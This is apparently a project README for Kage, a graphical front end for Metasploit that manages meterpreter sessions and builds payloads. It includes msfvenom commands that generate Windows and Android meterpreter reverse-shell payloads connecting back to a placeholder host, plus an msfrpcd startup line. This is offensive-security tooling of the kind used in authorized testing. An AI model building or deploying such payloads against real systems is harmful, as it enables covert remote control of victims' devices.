Kage – Graphical User Interface for Metasploit Meterpreter & Session Handler

Kage (ka-geh) is a tool inspired by AhMyth, designed to work with the Metasploit RPC server to interact with meterpreter sessions and generate payloads.
For now it only supports the windows/meterpreter and android/meterpreter payloads.
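
For context, these are the same payload types you would otherwise build by hand with msfvenom; the LHOST/LPORT values below are placeholders, not values Kage requires:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o payload.exe
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -o payload.apk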

Prerequisites

  • Metasploit-framework must be installed, with its binaries available in your PATH (a quick sanity check follows this list):
    • msfrpcd
    • msfvenom
    • msfdb
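
To confirm all three are reachable from your PATH (standard shell commands, nothing Kage-specific):

which msfrpcd msfvenom msfdb

If you want to start the RPC daemon manually, the flags below are standard msfrpcd options rather than anything Kage-specific; the username, password, and port are example values:

msfrpcd -U msf -P s3cr3t -p 55553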


Installing

Prebuilt Kage binaries can be downloaded from the project's releases page.
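
On Linux the releases are typically shipped as an AppImage; assuming that format, the file only needs to be marked executable before launching (the file name below is illustrative):

chmod +x Kage.*.AppImage
./Kage.*.AppImage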

For developers who want to run the app from source code:

Download the source code:

git clone https://github.com/WayzDev/Kage.git

Install the dependencies and run Kage:

cd Kage
yarn # or npm install
yarn run dev # or npm run dev

To build the project:

yarn run build

electron-vue officially recommends the yarn package manager as it handles dependencies much better and can help reduce final build size with yarn clean.

Screenshots

Video Tutorial

Disclaimer

I will not be responsible for any direct or indirect damage caused by the use of this tool; it is intended for educational purposes only.

Credit: @iFalah
